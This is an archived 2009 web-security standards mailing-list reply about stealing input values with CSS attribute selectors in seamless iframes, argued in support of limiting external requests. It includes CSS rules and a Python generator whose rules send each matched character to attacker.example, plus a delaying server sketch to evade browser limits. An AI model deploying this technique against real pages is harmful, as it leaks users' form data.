
Re: Seamless iframes + CSS3 selectors = bad idea

From: gaz Heyes <gazheyes@gmail.com>
Date: Tue, 8 Dec 2009 10:20:35 +0000
Message-ID: <252dd75b0912080220n7695f087rb19fdd0b6b82f261@mail.gmail.com>
To: Adam Barth <w3c@adambarth.com>
Cc: Daniel Glazman <daniel@glazman.org>, Thomas Roessler <tlr@w3.org>, public-web-security@w3.org
2009/12/8 Adam Barth <w3c@adambarth.com>

> I doubt that limiting the external requests is a viable approach.  I'm
> not aware of any success stories about preventing exfiltration in the
> web platform.  The platform just has way too many ways to send data.
>

Actually it is a good idea, but I wasn't clear. Current browsers already do
this (apart from Safari): you can't have a background image applied to the
same element multiple times. If I wanted to conduct this attack in Firefox,
for example, I'd have to create a different rule for each request I make,
otherwise the rule gets overwritten by the next one. I like to talk with
code, so this will explain it better:

input[value*="x"]#element {
  background: url(one request);
}

input[value*="y"]#element {
  -moz-binding: url(second request);
}

The rules overwrite each other if you use the same CSS property. I get
round this in Safari by using a sleep timer on the server-side request, so
it waits for the fake images to load, thus allowing the same element to
fire the same rule multiple times. If you limit the number of requests you
can make per element, then you limit the amount of data you can gather.
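To make the per-rule-request constraint concrete, here is a minimal sketch
(in Python; the endpoint URL and element id are hypothetical) that
generates one distinct CSS rule per candidate character of an input's
value. Each rule needs its own selector, because repeating the same
property on the same element would just overwrite the earlier rule and
yield only a single request:

```python
# Sketch: one attribute-selector rule per candidate character.
# The https://attacker.example/leak endpoint is hypothetical.

def exfil_rules(element_id: str, alphabet: str) -> str:
    """Emit a stylesheet with one rule per character in `alphabet`.

    value*="x" matches when the input's value contains "x"; the
    background URL encodes which character matched, so each rule that
    fires produces one distinguishable request.
    """
    rules = []
    for ch in alphabet:
        rules.append(
            'input[value*="%s"]#%s {\n'
            '  background: url(https://attacker.example/leak?c=%s);\n'
            '}' % (ch, element_id, ch)
        )
    return "\n\n".join(rules)

print(exfil_rules("element", "xy"))
```

Capping the number of external requests a single element's rules may
trigger would cap how many of these probes actually reach the server.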
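The server-side sleep timer could be sketched as below (a hypothetical
illustration using Python's standard `http.server`; the port and delay are
arbitrary). Holding each fake-image response open keeps the previous
request in flight, which is what lets the same rule fire again on the same
element in Safari:

```python
# Sketch of the "sleep timer" trick: delay each response to a fake
# background-image request so the browser still has it pending.
import time
from http.server import BaseHTTPRequestHandler, HTTPServer

DELAY_SECONDS = 0.2  # hold each response open briefly (arbitrary value)

class SlowLeakHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        time.sleep(DELAY_SECONDS)      # keep the request in flight
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.end_headers()             # empty body: a "fake image"

    def log_message(self, *args):      # silence default request logging
        pass

def serve_once(port: int = 8099) -> None:
    # Serve exactly one request, then shut down (enough for a demo).
    server = HTTPServer(("127.0.0.1", port), SlowLeakHandler)
    server.handle_request()
    server.server_close()
```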
Received on Tuesday, 8 December 2009 10:21:15 GMT
